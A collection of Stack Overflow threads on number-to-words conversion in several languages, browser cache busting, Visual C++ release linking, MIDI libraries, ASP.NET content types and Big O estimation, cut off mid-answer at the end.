string[] arr1 = new string[] { "One", "Two", "Three", "Four", "Five", "Six", "Seven", "Eight", "Nine" , "Ten", "Eleven", "Twelve", "Thirteen", "Fourteen", "Fifteen", "Sixteen", "Seventeen", "Eighteen", "Nineteen"};
name = arr1[num - 1];
}
return name;
}
public string second(int num)
{
string name;
if ((num == 0)||(num==1))
{
name = " ";
}
else
{
string[] arr1 = new string[] { "Twenty", "Thirty", "Forty", "Fifty", "Sixty", "Seventy", "Eighty", "Ninety" };
name = arr1[num - 2];
}
return name;
}
public string third(int num)
{
string name ;
if (num == 0)
{
name = "";
}
else
{
string[] arr1 = new string[] { "Hundred" };
name = arr1[0];
}
return name;
}
}
}
this works fine from 1 to 19999 will update soon after i complete it
A: The accepted answer doesn't seem to work perfectly. It doesn't handle dashes in numbers like twenty-one, it doesn't put the word "and" in for numbers like "one hundred and one", and, well, it is recursive.
Here is my shot at the answer. It adds the "and" word intelligently, and hyphenates numbers appropriately. Let me know if any modifications are needed.
Here is how to call it (obviously you will want to put this in a class somewhere):
for (int i = int.MinValue+1; i < int.MaxValue; i++)
{
Console.WriteLine(ToWords(i));
}
Here is the code:
private static readonly string[] Ones = {"", "One", "Two", "Three", "Four", "Five", "Six", "Seven", "Eight", "Nine"};
private static readonly string[] Teens =
{
"Ten", "Eleven", "Twelve", "Thirteen", "Fourteen", "Fifteen", "Sixteen",
"Seventeen", "Eighteen", "Nineteen"
};
private static readonly string[] Tens =
{
"", "", "Twenty", "Thirty", "Forty", "Fifty", "Sixty", "Seventy", "Eighty",
"Ninety"
};
public static string ToWords(int number)
{
if (number == 0)
return "Zero";
var wordsList = new List<string>();
if (number < 0)
{
wordsList.Add("Negative");
number = Math.Abs(number);
}
if (number >= 1000000000 && number <= int.MaxValue) //billions
{
int billionsValue = number / 1000000000;
GetValuesUnder1000(billionsValue, wordsList);
wordsList.Add("Billion");
number -= billionsValue * 1000000000;
if (number > 0 && number < 10)
wordsList.Add("and");
}
if (number >= 1000000 && number < 1000000000) //millions
{
int millionsValue = number / 1000000;
GetValuesUnder1000(millionsValue, wordsList);
wordsList.Add("Million");
number -= millionsValue * 1000000;
if (number > 0 && number < 10)
wordsList.Add("and");
}
if (number >= 1000 && number < 1000000) //thousands
{
int thousandsValue = number/1000;
GetValuesUnder1000(thousandsValue, wordsList);
wordsList.Add("Thousand");
number -= thousandsValue * 1000;
if (number > 0 && number < 10)
wordsList.Add("and");
}
GetValuesUnder1000(number, wordsList);
return string.Join(" ", wordsList);
}
private static void GetValuesUnder1000(int number, List<string> wordsList)
{
while (number != 0)
{
if (number < 10)
{
wordsList.Add(Ones[number]);
number -= number;
}
else if (number < 20)
{
wordsList.Add(Teens[number - 10]);
number -= number;
}
else if (number < 100)
{
int tensValue = ((int) (number/10))*10;
int onesValue = number - tensValue;
if (onesValue == 0)
{
wordsList.Add(Tens[tensValue/10]);
}
else
{
wordsList.Add(Tens[tensValue/10] + "-" + Ones[onesValue]);
}
number -= tensValue;
number -= onesValue;
}
else if (number < 1000)
{
int hundredsValue = ((int) (number/100))*100;
wordsList.Add(Ones[hundredsValue/100]);
wordsList.Add("Hundred");
number -= hundredsValue;
if (number > 0)
wordsList.Add("and");
}
}
}
A: I use this code.It is VB code but you can easily translate it to C#. It works
Function NumberToText(ByVal n As Integer) As String
Select Case n
Case 0
Return ""
Case 1 To 19
Dim arr() As String = {"One","Two","Three","Four","Five","Six","Seven", _
"Eight","Nine","Ten","Eleven","Twelve","Thirteen","Fourteen", _
"Fifteen","Sixteen","Seventeen","Eighteen","Nineteen"}
Return arr(n-1) & " "
Case 20 to 99
Dim arr() as String = {"Twenty","Thirty","Forty","Fifty","Sixty","Seventy","Eighty","Ninety"}
Return arr(n\10 -2) & " " & NumberToText(n Mod 10)
Case 100 to 199
Return "One Hundred " & NumberToText(n Mod 100)
Case 200 to 999
Return NumberToText(n\100) & "Hundreds " & NumberToText(n mod 100)
Case 1000 to 1999
Return "One Thousand " & NumberToText(n Mod 1000)
Case 2000 to 999999
Return NumberToText(n\1000) & "Thousands " & NumberToText(n Mod 1000)
Case 1000000 to 1999999
Return "One Million " & NumberToText(n Mod 1000000)
Case 1000000 to 999999999
Return NumberToText(n\1000000) & "Millions " & NumberToText(n Mod 1000000)
Case 1000000000 to 1999999999
Return "One Billion " & NumberTotext(n Mod 1000000000)
Case Else
Return NumberToText(n\1000000000) & "Billion " _
& NumberToText(n mod 1000000000)
End Select
End Function
Here is the code in c#
public static string AmountInWords(double amount)
{
var n = (int)amount;
if (n == 0)
return "";
else if (n > 0 && n <= 19)
{
var arr = new string[] { "One", "Two", "Three", "Four", "Five", "Six", "Seven", "Eight", "Nine", "Ten", "Eleven", "Twelve", "Thirteen", "Fourteen", "Fifteen", "Sixteen", "Seventeen", "Eighteen", "Nineteen" };
return arr[n - 1] + " ";
}
else if (n >= 20 && n <= 99)
{
var arr = new string[] { "Twenty", "Thirty", "Forty", "Fifty", "Sixty", "Seventy", "Eighty", "Ninety" };
return arr[n / 10 - 2] + " " + AmountInWords(n % 10);
}
else if (n >= 100 && n <= 199)
{
return "One Hundred " + AmountInWords(n % 100);
}
else if (n >= 200 && n <= 999)
{
return AmountInWords(n / 100) + "Hundred " + AmountInWords(n % 100);
}
else if (n >= 1000 && n <= 1999)
{
return "One Thousand " + AmountInWords(n % 1000);
}
else if (n >= 2000 && n <= 999999)
{
return AmountInWords(n / 1000) + "Thousand " + AmountInWords(n % 1000);
}
else if (n >= 1000000 && n <= 1999999)
{
return "One Million " + AmountInWords(n % 1000000);
}
else if (n >= 1000000 && n <= 999999999)
{
return AmountInWords(n / 1000000) + "Million " + AmountInWords(n % 1000000);
}
else if (n >= 1000000000 && n <= 1999999999)
{
return "One Billion " + AmountInWords(n % 1000000000);
}
else
{
return AmountInWords(n / 1000000000) + "Billion " + AmountInWords(n % 1000000000);
}
}
A: Here is a C# Console Application that will return whole numbers as well as decimals.
A: Just for Turkish representation of the class HumanFriendlyInteger (↑) (Türkçe, sayı yazı karşılığı):
public static class HumanFriendlyInteger
{
static string[] ones = new string[] { "", "Bir", "İki", "Üç", "Dört", "Beş", "Altı", "Yedi", "Sekiz", "Dokuz" };
static string[] teens = new string[] { "On", "On Bir", "On İki", "On Üç", "On Dört", "On Beş", "On Altı", "On Yedi", "On Sekiz", "On Dokuz" };
static string[] tens = new string[] { "Yirmi", "Otuz", "Kırk", "Elli", "Altmış", "Yetmiş", "Seksen", "Doksan" };
static string[] thousandsGroups = { "", " Bin", " Milyon", " Milyar" };
private static string FriendlyInteger(int n, string leftDigits, int thousands)
{
if (n == 0)
{
return leftDigits;
}
string friendlyInt = leftDigits;
if (friendlyInt.Length > 0)
{
friendlyInt += " ";
}
if (n < 10)
friendlyInt += ones[n];
else if (n < 20)
friendlyInt += teens[n - 10];
else if (n < 100)
friendlyInt += FriendlyInteger(n % 10, tens[n / 10 - 2], 0);
else if (n < 1000)
friendlyInt += FriendlyInteger(n % 100, ((n / 100 == 1 ? "" : ones[n / 100] + " ") + "Yüz"), 0); // Yüz 1 ile başlangıçta "Bir" kelimesini Türkçe'de almaz.
else
friendlyInt += FriendlyInteger(n % 1000, FriendlyInteger(n / 1000, "", thousands + 1), 0);
return friendlyInt + thousandsGroups[thousands];
}
public static string IntegerToWritten(int n)
{
if (n == 0)
return "Sıfır";
else if (n < 0)
return "Eksi " + IntegerToWritten(-n);
return FriendlyInteger(n, "", 0);
}
A: Just get that string and convert with the
like as
string s = txtNumber.Text.Tostring();
int i = Convert.ToInt32(s.Tostring());
It will write only full integer value
A: An extension of Nick Masao's answer for Bengali Numeric of same problem. Inital input of number is in Unicode string. Cheers!!
string number = "২২৮৯";
number = number.Replace("০", "0").Replace("১", "1").Replace("২", "2").Replace("৩", "3").Replace("৪", "4").Replace("৫", "5").Replace("৬", "6").Replace("৭", "7").Replace("৮", "8").Replace("৯", "9");
double vtempdbl = Convert.ToDouble(number);
string amount = AmountInWords(vtempdbl);
private static string AmountInWords(double amount)
{
var n = (int)amount;
if (n == 0)
return " ";
else if (n > 0 && n <= 99)
{
var arr = new string[] { "এক", "দুই", "তিন", "চার", "পাঁচ", "ছয়", "সাত", "আট", "নয়", "দশ", "এগার", "বারো", "তের", "চৌদ্দ", "পনের", "ষোল", "সতের", "আঠার", "ঊনিশ", "বিশ", "একুশ", "বাইস", "তেইশ", "চব্বিশ", "পঁচিশ", "ছাব্বিশ", "সাতাশ", "আঠাশ", "ঊনত্রিশ", "ত্রিশ", "একত্রিস", "বত্রিশ", "তেত্রিশ", "চৌত্রিশ", "পঁয়ত্রিশ", "ছত্রিশ", "সাঁইত্রিশ", "আটত্রিশ", "ঊনচল্লিশ", "চল্লিশ", "একচল্লিশ", "বিয়াল্লিশ", "তেতাল্লিশ", "চুয়াল্লিশ", "পয়তাল্লিশ", "ছিচল্লিশ", "সাতচল্লিশ", "আতচল্লিশ", "উনপঞ্চাশ", "পঞ্চাশ", "একান্ন", "বায়ান্ন", "তিপ্পান্ন", "চুয়ান্ন", "পঞ্চান্ন", "ছাপ্পান্ন", "সাতান্ন", "আটান্ন", "উনষাট", "ষাট", "একষট্টি", "বাষট্টি", "তেষট্টি", "চৌষট্টি", "পয়ষট্টি", "ছিষট্টি", " সাতষট্টি", "আটষট্টি", "ঊনসত্তর ", "সত্তর", "একাত্তর ", "বাহাত্তর", "তেহাত্তর", "চুয়াত্তর", "পঁচাত্তর", "ছিয়াত্তর", "সাতাত্তর", "আটাত্তর", "ঊনাশি", "আশি", "একাশি", "বিরাশি", "তিরাশি", "চুরাশি", "পঁচাশি", "ছিয়াশি", "সাতাশি", "আটাশি", "উননব্বই", "নব্বই", "একানব্বই", "বিরানব্বই", "তিরানব্বই", "চুরানব্বই", "পঁচানব্বই ", "ছিয়ানব্বই ", "সাতানব্বই", "আটানব্বই", "নিরানব্বই" };
return arr[n - 1] + " ";
}
else if (n >= 100 && n <= 199)
{
return AmountInWords(n / 100) + "এক শত " + AmountInWords(n % 100);
}
else if (n >= 100 && n <= 999)
{
return AmountInWords(n / 100) + "শত " + AmountInWords(n % 100);
}
else if (n >= 1000 && n <= 1999)
{
return "এক হাজার " + AmountInWords(n % 1000);
}
else if (n >= 1000 && n <= 99999)
{
return AmountInWords(n / 1000) + "হাজার " + AmountInWords(n % 1000);
}
else if (n >= 100000 && n <= 199999)
{
return "এক লাখ " + AmountInWords(n % 100000);
}
else if (n >= 100000 && n <= 9999999)
{
return AmountInWords(n / 100000) + "লাখ " + AmountInWords(n % 100000);
}
else if (n >= 10000000 && n <= 19999999)
{
return "এক কোটি " + AmountInWords(n % 10000000);
}
else
{
return AmountInWords(n / 10000000) + "কোটি " + AmountInWords(n % 10000000);
}
}
A: The following C# console app code will accepts a monetary value in numbers up to 2 decimals and prints it in English. This not only converts integer to its English equivalent but as a monetary value in dollars and cents.
namespace ConsoleApplication2
{
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text.RegularExpressions;
class Program
{
static void Main(string[] args)
{
bool repeat = true;
while (repeat)
{
string inputMonetaryValueInNumberic = string.Empty;
string centPart = string.Empty;
string dollarPart = string.Empty;
Console.Write("\nEnter the monetary value : ");
inputMonetaryValueInNumberic = Console.ReadLine();
inputMonetaryValueInNumberic = inputMonetaryValueInNumberic.TrimStart('0');
if (ValidateInput(inputMonetaryValueInNumberic))
{
if (inputMonetaryValueInNumberic.Contains('.'))
{
centPart = ProcessCents(inputMonetaryValueInNumberic.Substring(inputMonetaryValueInNumberic.IndexOf(".") + 1));
dollarPart = ProcessDollar(inputMonetaryValueInNumberic.Substring(0, inputMonetaryValueInNumberic.IndexOf(".")));
}
else
{
dollarPart = ProcessDollar(inputMonetaryValueInNumberic);
}
centPart = string.IsNullOrWhiteSpace(centPart) ? string.Empty : " and " + centPart;
Console.WriteLine(string.Format("\n\n{0}{1}", dollarPart, centPart));
}
else
{
Console.WriteLine("Invalid Input..");
}
Console.WriteLine("\n\nPress any key to continue or Escape of close : ");
var loop = Console.ReadKey();
repeat = !loop.Key.ToString().Contains("Escape");
Console.Clear();
}
}
private static string ProcessCents(string cents)
{
string english = string.Empty;
string dig3 = Process3Digit(cents);
if (!string.IsNullOrWhiteSpace(dig3))
{
dig3 = string.Format("{0} {1}", dig3, GetSections(0));
}
english = dig3 + english;
return english;
}
private static string ProcessDollar(string dollar)
{
string english = string.Empty;
foreach (var item in Get3DigitList(dollar))
{
string dig3 = Process3Digit(item.Value);
if (!string.IsNullOrWhiteSpace(dig3))
{
dig3 = string.Format("{0} {1}", dig3, GetSections(item.Key));
}
english = dig3 + english;
}
return english;
}
private static string Process3Digit(string digit3)
{
string result = string.Empty;
if (Convert.ToInt32(digit3) != 0)
{
int place = 0;
Stack<string> monetaryValue = new Stack<string>();
for (int i = digit3.Length - 1; i >= 0; i--)
{
place += 1;
string stringValue = string.Empty;
switch (place)
{
case 1:
stringValue = GetOnes(digit3[i].ToString());
break;
case 2:
int tens = Convert.ToInt32(digit3[i]);
if (tens == 1)
{
if (monetaryValue.Count > 0)
{
monetaryValue.Pop();
}
stringValue = GetTens((digit3[i].ToString() + digit3[i + 1].ToString()));
}
else
{
stringValue = GetTens(digit3[i].ToString());
}
break;
case 3:
stringValue = GetOnes(digit3[i].ToString());
if (!string.IsNullOrWhiteSpace(stringValue))
{
string postFixWith = " Hundred";
if (monetaryValue.Count > 0)
{
postFixWith = postFixWith + " And";
}
stringValue += postFixWith;
}
break;
}
if (!string.IsNullOrWhiteSpace(stringValue))
monetaryValue.Push(stringValue);
}
while (monetaryValue.Count > 0)
{
result += " " + monetaryValue.Pop().ToString().Trim();
}
}
return result;
}
private static Dictionary<int, string> Get3DigitList(string monetaryValueInNumberic)
{
Dictionary<int, string> hundredsStack = new Dictionary<int, string>();
int counter = 0;
while (monetaryValueInNumberic.Length >= 3)
{
string digit3 = monetaryValueInNumberic.Substring(monetaryValueInNumberic.Length - 3, 3);
monetaryValueInNumberic = monetaryValueInNumberic.Substring(0, monetaryValueInNumberic.Length - 3);
hundredsStack.Add(++counter, digit3);
}
if (monetaryValueInNumberic.Length != 0)
hundredsStack.Add(++counter, monetaryValueInNumberic);
return hundredsStack;
}
private static string GetTens(string tensPlaceValue)
{
string englishEquvalent = string.Empty;
int value = Convert.ToInt32(tensPlaceValue);
Dictionary<int, string> tens = new Dictionary<int, string>();
tens.Add(2, "Twenty");
tens.Add(3, "Thirty");
tens.Add(4, "Forty");
tens.Add(5, "Fifty");
tens.Add(6, "Sixty");
tens.Add(7, "Seventy");
tens.Add(8, "Eighty");
tens.Add(9, "Ninty");
tens.Add(10, "Ten");
tens.Add(11, "Eleven");
tens.Add(12, "Twelve");
tens.Add(13, "Thrteen");
tens.Add(14, "Fourteen");
tens.Add(15, "Fifteen");
tens.Add(16, "Sixteen");
tens.Add(17, "Seventeen");
tens.Add(18, "Eighteen");
tens.Add(19, "Ninteen");
if (tens.ContainsKey(value))
{
englishEquvalent = tens[value];
}
return englishEquvalent;
}
private static string GetOnes(string onesPlaceValue)
{
int value = Convert.ToInt32(onesPlaceValue);
string englishEquvalent = string.Empty;
Dictionary<int, string> ones = new Dictionary<int, string>();
ones.Add(1, " One");
ones.Add(2, " Two");
ones.Add(3, " Three");
ones.Add(4, " Four");
ones.Add(5, " Five");
ones.Add(6, " Six");
ones.Add(7, " Seven");
ones.Add(8, " Eight");
ones.Add(9, " Nine");
if (ones.ContainsKey(value))
{
englishEquvalent = ones[value];
}
return englishEquvalent;
}
private static string GetSections(int section)
{
string sectionName = string.Empty;
switch (section)
{
case 0:
sectionName = "Cents";
break;
case 1:
sectionName = "Dollars";
break;
case 2:
sectionName = "Thousand";
break;
case 3:
sectionName = "Million";
break;
case 4:
sectionName = "Billion";
break;
case 5:
sectionName = "Trillion";
break;
case 6:
sectionName = "Zillion";
break;
}
return sectionName;
}
private static bool ValidateInput(string input)
{
return Regex.IsMatch(input, "[0-9]{1,18}(\\.[0-9]{1,2})?"))
}
}
}
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3213",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "62"
} |
Q: How can I make the browser see CSS and Javascript changes? CSS and Javascript files don't change very often, so I want them to be cached by the web browser. But I also want the web browser to see changes made to these files without requiring the user to clear their browser cache. Also want a solution that works well with a version control system such as Subversion.
Some solutions I have seen involve adding a version number to the end of the file in the form of a query string.
Could use the SVN revision number to automate this for you: ASP.NET Display SVN Revision Number
Can you specify how you include the Revision variable of another file? That is in the HTML file I can include the Revision number in the URL to the CSS or Javascript file.
In the Subversion book it says about Revision: "This keyword describes the last known revision in which this file changed in the repository".
Firefox also allows pressing CTRL+R to reload everything on a particular page.
To clarify I am looking for solutions that don't require the user to do anything on their part.
A: In my opinion, it is better to make the version number part of the file itself e.g. myscript.1.2.3.js. You can set your webserver to cache this file forever, and just add a new js file when you have a new version.
A: When you release a new version of your CSS or JS libraries, cause the following to occur:
*
*modify the filename to include a unique version string
*modify the HTML files which reference the library to point at the versioned file
(this is usually a pretty simple matter for a release script)
Now you can set the Expires for the CSS/JS to be years in the future. Whenever you change the content, if the referencing HTML points to a new URI, browsers will no longer use the old cached copy.
This causes the caching behavior you want without requiring anything of the user.
A: I was also wondering how to do this, when I found grom's answer. Thanks for the code.
I struggled with understanding how the code was supposed to be used. (I don't use a version control system.) In summary, you include the timestamp (ts) when you call the stylesheet. You're not planning on changing the stylesheet often:
<?php
include ('grom_file.php');
// timestamp on the filename has to be updated manually
include_css('_stylesheets/style.css?ts=20080912162813', 'all');
?>
A: I found that if you append the last modified timestamp of the file onto the end of the URL the browser will request the files when it is modified. For example in PHP:
function urlmtime($url) {
$parsed_url = parse_url($url);
$path = $parsed_url['path'];
if ($path[0] == "/") {
$filename = $_SERVER['DOCUMENT_ROOT'] . "/" . $path;
} else {
$filename = $path;
}
if (!file_exists($filename)) {
// If not a file then use the current time
$lastModified = date('YmdHis');
} else {
$lastModified = date('YmdHis', filemtime($filename));
}
if (strpos($url, '?') === false) {
$url .= '?ts=' . $lastModified;
} else {
$url .= '&ts=' . $lastModified;
}
return $url;
}
function include_css($css_url, $media='all') {
// According to Yahoo, using link allows for progressive
// rendering in IE where as @import url($css_url) does not
echo '<link rel="stylesheet" type="text/css" media="' .
$media . '" href="' . urlmtime($css_url) . '">'."\n";
}
function include_javascript($javascript_url) {
echo '<script type="text/javascript" src="' . urlmtime($javascript_url) .
'"></script>'."\n";
}
A: Some solutions I have seen involve adding a version number to the end of the file in the form of a query string.
<script type="text/javascript" src="funkycode.js?v1">
You could use the SVN revision number to automate this for you by including the word LastChangedRevision in your html file after where v1 appears above. You must also setup your repository to do this.
I hope this further clarifies my answer?
Firefox also allows pressing CTRL + R to reload everything on a particular page.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3224",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "64"
} |
Q: How do you pack a visual studio c++ project for release? I'm wondering how to make a release build that includes all necessary dll files into the .exe so the program can be run on a non-development machine without it having to install the microsoft redistributable on the target machine.
Without doing this you get the error message that the application configuration is not correct and to reinstall.
A: Be aware that Microsoft do not recommend that you static link the runtime into your project, as this prevents it from being serviced by windows update to fix critical security bugs. There are also potential problems if you are passing memory between your main .exe and .dll files as if each of these static links the runtime you can end up with malloc/free mismatch problems.
You can include the DLLs with the executable, without compiling them into the .exe and without running the redist tool - this is what I do and it seems to work fine.
The only fly in the ointment is that you need to include the files twice if you're distributing for a wide range of Windows versions - newer OSs need the files in manifest-defined directories, and older ones want all the files in the program directory.
A: *
*Choose Project -> Properties
*Select Configuration -> General
*In the box for how you should link MFC, choose to statically link it.
*Choose Linker -> Input. Under Additional Dependencies, add any libraries you need your app to statically link in.
A: You need to set the run-time library (Under C/C++ -> Code Generation) for ALL projects to static linkage, which correlates to the following default building configurations:
*
*Multithreaded Debug/Release
*Singlethreaded Debug/Release
As opposed to the "DLL" versions of those libraries.
Even if you do that, depending on the libraries you're using, you might have to install a Merge Module/framework/etc. It depends on whether static LIB versions of your dependencies are available.
A: You'd be looking to static link (as opposed to dynamically link)
I'm not sure how many of the MS redistributables statically link in.
A: If you are looking to find out which dll's your target machine is missing then use depends.exe which used to come with MSDev, but can also be found here. Testing this on a few target machines should tell you which dll's you need to package with your application.
A: You should use a static link and add all libraries you need under additional dependencies.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3230",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "38"
} |
Q: C/C++ library for reading MIDI signals from a USB MIDI device I want to write C/C++ programs that take input from a MIDI device.
The MIDI device connects to my PC using a USB connector.
I'm looking for a (C/C++ implemented) library that I can use to read the MIDI signals from the MIDI device through the USB port.
I'm happy manipulating the MIDI data once I get it, I just don't want to have to implement the code for its capture.
I'm planning on writing my code using the Bloodshed Dev-C++ IDE on Windows XP.
A: PortMidi is another open source cross-platform MIDI I/O library worth checking out. On the other hand, if you are working on a sysex type of app, then direct Win32 works easily enough.
Just came across another open source cross-platform framework that includes MIDI support: Juce.
Also, I should note that there isn't anything special about a USB connected MIDI device. It will still be presented as a MIDI device in Windows and you will use standard MIDI APIs (mmsystem) to communicate with it.
[July 2014] I just came across RtMidi that looks to be a nice, compact, open source cross-platform C++ library.
A: Check out the open source project LMMS. It's a music studio for Linux that includes the ability to use MIDI keyboards with software instruments. If you dig around in source files with 'midi' in the name, you'll probably find what you're looking for.
A: Maybe the Jack source code may help too. It's a sound driver for Posix compatible systems with a lot of possibilities and supports USB and Firewire audio devices.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3231",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "31"
} |
Q: Displaying ad content from Respose.WriteFile()/ Response.ContentType How would one display any add content from a "dynamic" aspx page? Currently I am working on using the System.Web.HttpResponse "Page.Response" to write a file that is stored on a web server to a web request.
This would allow people to hit a url to the type http://www.foo.com?Image=test.jpg and have the image display in their browser. So as you may know this revolves around the use of Response.ContentType.
By using
Response.ContentType = "application/octet-stream";
I am able to display images of type gif/jpeg/png (all i have tested so far), bit trying to display .swf or .ico files gives me a nice little error.
using
Response.ContentType = "application/x-shockwave-flash";
I can get flash files to play, but then the images are messed.
So how do i easily choose the contenttype?
A: This is ugly, but the best way is to look at the file and set the content type as appropriate:
switch ( fileExtension )
{
case "pdf": Response.ContentType = "application/pdf"; break;
case "swf": Response.ContentType = "application/x-shockwave-flash"; break;
case "gif": Response.ContentType = "image/gif"; break;
case "jpeg": Response.ContentType = "image/jpg"; break;
case "jpg": Response.ContentType = "image/jpg"; break;
case "png": Response.ContentType = "image/png"; break;
case "mp4": Response.ContentType = "video/mp4"; break;
case "mpeg": Response.ContentType = "video/mpeg"; break;
case "mov": Response.ContentType = "video/quicktime"; break;
case "wmv":
case "avi": Response.ContentType = "video/x-ms-wmv"; break;
//and so on
default: Response.ContentType = "application/octet-stream"; break;
}
A: This is part of a solution I use on a local intranet. Some of the variables you will have to collect yourself as I pull them from a database but you may pull them from somewhere else.
The only extra but I've got in there is a function called getMimeType which connects to the database and pulls back the correct mine type based on file extension. This defaults to application/octet-stream if none is found.
// Clear the response buffer incase there is anything already in it.
Response.Clear();
Response.Buffer = true;
// Read the original file from disk
FileStream myFileStream = new FileStream(sPath, FileMode.Open);
long FileSize = myFileStream.Length;
byte[] Buffer = new byte[(int)FileSize];
myFileStream.Read(Buffer, 0, (int)FileSize);
myFileStream.Close();
// Tell the browse stuff about the file
Response.AddHeader("Content-Length", FileSize.ToString());
Response.AddHeader("Content-Disposition", "inline; filename=" + sFilename.Replace(" ","_"));
Response.ContentType = getMimeType(sExtention, oConnection);
// Send the data to the browser
Response.BinaryWrite(Buffer);
Response.End();
A: Yup Keith ugly but true. I ended up placing the MIME types that we would use into a database and then pull them out when I was publishing a file. I still can't believe that there is no autoritive list of types out there or that there is no mention of what is available in MSDN.
I found this site that provided some help.
A: Since .Net 4.5 one can use
MimeMapping.GetMimeMapping
It returns the MIME mapping for the specified file name.
https://learn.microsoft.com/en-us/dotnet/api/system.web.mimemapping.getmimemapping
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3234",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "21"
} |
Q: Big O, how do you calculate/approximate it? Most people with a degree in CS will certainly know what Big O stands for.
It helps us to measure how well an algorithm scales.
But I'm curious, how do you calculate or approximate the complexity of your algorithms?
A: Less useful generally, I think, but for the sake of completeness there is also a Big Omega Ω, which defines a lower-bound on an algorithm's complexity, and a Big Theta Θ, which defines both an upper and lower bound.
A: Big O notation is useful because it's easy to work with and hides unnecessary complications and details (for some definition of unnecessary). One nice way of working out the complexity of divide and conquer algorithms is the tree method. Let's say you have a version of quicksort with the median procedure, so you split the array into perfectly balanced subarrays every time.
Now build a tree corresponding to all the arrays you work with. At the root you have the original array, the root has two children which are the subarrays. Repeat this until you have single element arrays at the bottom.
Since we can find the median in O(n) time and split the array in two parts in O(n) time, the work done at each node is O(k) where k is the size of the array. Each level of the tree contains (at most) the entire array so the work per level is O(n) (the sizes of the subarrays add up to n, and since we have O(k) per level we can add this up). There are only log(n) levels in the tree since each time we halve the input.
Therefore we can upper bound the amount of work by O(n*log(n)).
However, Big O hides some details which we sometimes can't ignore. Consider computing the Fibonacci sequence with
a=0;
b=1;
for (i = 0; i <n; i++) {
tmp = b;
b = a + b;
a = tmp;
}
and lets just assume the a and b are BigIntegers in Java or something that can handle arbitrarily large numbers. Most people would say this is an O(n) algorithm without flinching. The reasoning is that you have n iterations in the for loop and O(1) work in side the loop.
But Fibonacci numbers are large, the n-th Fibonacci number is exponential in n so just storing it will take on the order of n bytes. Performing addition with big integers will take O(n) amount of work. So the total amount of work done in this procedure is
1 + 2 + 3 + ... + n = n(n-1)/2 = O(n^2)
So this algorithm runs in quadradic time!
A: Familiarity with the algorithms/data structures I use and/or quick glance analysis of iteration nesting. The difficulty is when you call a library function, possibly multiple times - you can often be unsure of whether you are calling the function unnecessarily at times or what implementation they are using. Maybe library functions should have a complexity/efficiency measure, whether that be Big O or some other metric, that is available in documentation or even IntelliSense.
A: Break down the algorithm into pieces you know the big O notation for, and combine through big O operators. That's the only way I know of.
For more information, check the Wikipedia page on the subject.
A: As to "how do you calculate" Big O, this is part of Computational complexity theory. For some (many) special cases you may be able to come with some simple heuristics (like multiplying loop counts for nested loops), esp. when all you want is any upper bound estimation, and you do not mind if it is too pessimistic - which I guess is probably what your question is about.
If you really want to answer your question for any algorithm the best you can do is to apply the theory. Besides of simplistic "worst case" analysis I have found Amortized analysis very useful in practice.
A: For the 1st case, the inner loop is executed n-i times, so the total number of executions is the sum for i going from 0 to n-1 (because lower than, not lower than or equal) of the n-i. You get finally n*(n + 1) / 2, so O(n²/2) = O(n²).
For the 2nd loop, i is between 0 and n included for the outer loop; then the inner loop is executed when j is strictly greater than n, which is then impossible.
A: I would like to explain the Big-O in a little bit different aspect.
Big-O is just to compare the complexity of the programs which means how fast are they growing when the inputs are increasing and not the exact time which is spend to do the action.
IMHO in the big-O formulas you better not to use more complex equations (you might just stick to the ones in the following graph.) However you still might use other more precise formula (like 3^n, n^3, ...) but more than that can be sometimes misleading! So better to keep it as simple as possible.
I would like to emphasize once again that here we don't want to get an exact formula for our algorithm. We only want to show how it grows when the inputs are growing and compare with the other algorithms in that sense. Otherwise you would better use different methods like bench-marking.
A: Small reminder: the big O notation is used to denote asymptotic complexity (that is, when the size of the problem grows to infinity), and it hides a constant.
This means that between an algorithm in O(n) and one in O(n2), the fastest is not always the first one (though there always exists a value of n such that for problems of size >n, the first algorithm is the fastest).
Note that the hidden constant very much depends on the implementation!
Also, in some cases, the runtime is not a deterministic function of the size n of the input. Take sorting using quick sort for example: the time needed to sort an array of n elements is not a constant but depends on the starting configuration of the array.
There are different time complexities:
*
*Worst case (usually the simplest to figure out, though not always very meaningful)
*Average case (usually much harder to figure out...)
*...
A good introduction is An Introduction to the Analysis of Algorithms by R. Sedgewick and P. Flajolet.
As you say, premature optimisation is the root of all evil, and (if possible) profiling really should always be used when optimising code. It can even help you determine the complexity of your algorithms.
A: In addition to using the master method (or one of its specializations), I test my algorithms experimentally. This can't prove that any particular complexity class is achieved, but it can provide reassurance that the mathematical analysis is appropriate. To help with this reassurance, I use code coverage tools in conjunction with my experiments, to ensure that I'm exercising all the cases.
As a very simple example say you wanted to do a sanity check on the speed of the .NET framework's list sort. You could write something like the following, then analyze the results in Excel to make sure they did not exceed an n*log(n) curve.
In this example I measure the number of comparisons, but it's also prudent to examine the actual time required for each sample size. However then you must be even more careful that you are just measuring the algorithm and not including artifacts from your test infrastructure.
int nCmp = 0;
System.Random rnd = new System.Random();
// measure the time required to sort a list of n integers
void DoTest(int n)
{
List<int> lst = new List<int>(n);
for( int i=0; i<n; i++ )
lst[i] = rnd.Next(0,1000);
// as we sort, keep track of the number of comparisons performed!
nCmp = 0;
lst.Sort( delegate( int a, int b ) { nCmp++; return (a<b)?-1:((a>b)?1:0)); }
System.Console.Writeline( "{0},{1}", n, nCmp );
}
// Perform measurement for a variety of sample sizes.
// It would be prudent to check multiple random samples of each size, but this is OK for a quick sanity check
for( int n = 0; n<1000; n++ )
DoTest(n);
A: Don't forget to also allow for space complexities that can also be a cause for concern if one has limited memory resources. So for example you may hear someone wanting a constant space algorithm which is basically a way of saying that the amount of space taken by the algorithm doesn't depend on any factors inside the code.
Sometimes the complexity can come from how many times is something called, how often is a loop executed, how often is memory allocated, and so on is another part to answer this question.
Lastly, big O can be used for worst case, best case, and amortization cases where generally it is the worst case that is used for describing how bad an algorithm may be.
A: First of all, the accepted answer is trying to explain nice fancy stuff,
but I think, intentionally complicating Big-Oh is not the solution,
which programmers (or at least, people like me) search for.
Big Oh (in short)
function f(text) {
